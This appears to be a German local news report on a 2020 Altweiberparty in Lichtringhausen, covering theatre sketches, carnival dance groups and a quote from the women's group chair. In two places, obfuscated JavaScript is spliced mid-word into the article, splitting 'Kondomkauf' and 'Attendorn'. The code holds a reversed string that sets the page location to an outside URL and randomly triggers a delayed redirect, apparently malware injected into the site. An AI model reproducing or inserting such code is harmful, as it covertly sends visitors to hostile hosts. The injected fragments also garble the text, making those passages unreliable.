Skip to content Skip to main navigation Skip to footer

Altweiberparty begeisterte alle Generationen

Am 20.02.2020 fand die diesjährige Altweiberparty der Frauengemeinschaft statt. Anknüpfend an eine grandiose Veranstaltung im letzten Jahr, feierten die Frauen aus Lichtringhausen und Umgebung auch in diesem Jahr bis früh morgens. Ein abwechslungsreiches Programm aus Tänzen und Theaterstücken begeisterten Jung und Alt.

Nach einer monatelangen Vorbereitung konnte die Theatergruppe am Donnerstag ihr neues Programm vorstellen. Neben dem Kontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domkauf in der Apotheke sorgte unter anderem auch die Eheberatung für eine ausgelassene Stimmung. Die Mühe und Arbeit hatten sich definitiv gelohnt.

Zusätzlich zu dem Theaterprogramm, den Showacts und einer Hitparade standen auch in diesem Jahr wieder viele Tanzgarden aus Lichtringhausen und Umgebung auf dem Programm. Als jüngste Garde präsentierten die Mädchen der Prinzengarde Rot-Weiß Neuenhof ihren neuen Tanz, der wie immer für Begeisterung sorgte. Ein großes Lob bekam auch die Mädchengarde Lichtringhausen, die zum ersten Mal unter neuem Namen ihren Showtanz zum Thema „Achtung Fischalarm“ auf die Bühne brachte. Wie letztes Jahr, sorgte das Männerballett aus dem Ihnetal auch in diesem Jahr wieder für eine kochende Stimmung in der Schützenhalle. Weitere Garden waren die Golden Girls aus dem Ihnetal, die Sputnix aus Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn, die Crazy Dancers aus Windhausen und die Mädels der Kolpingfamilie Olpe.

Ein Highlight war der Auftritt der Roten Funken Lichtringhausen. Zusätzlich zu ihrem diesjährigen Tanz gab es eine Überraschung für den Trainer, dessen letzte Session am Aschermittwoch endet. 30 ehemalige Gardisten studierten heimlich einen Tanz ein, der zum Abschluss des Programms präsentiert wurde.

Anschließend folgte die After-Show-Party mit Longdrinks und DJ. Die 1. Vorsitzende der Frauengemeinschaft, Ute Lübke, zeigt sich auch in diesem Jahr wieder begeistert: „Das war rundum wieder eine sehr gelungene Veranstaltung. Wir freuen uns, dass das Programm so gut ankommt und bis zum Schluss die Tanzfläche zum Beben gebracht wurde!“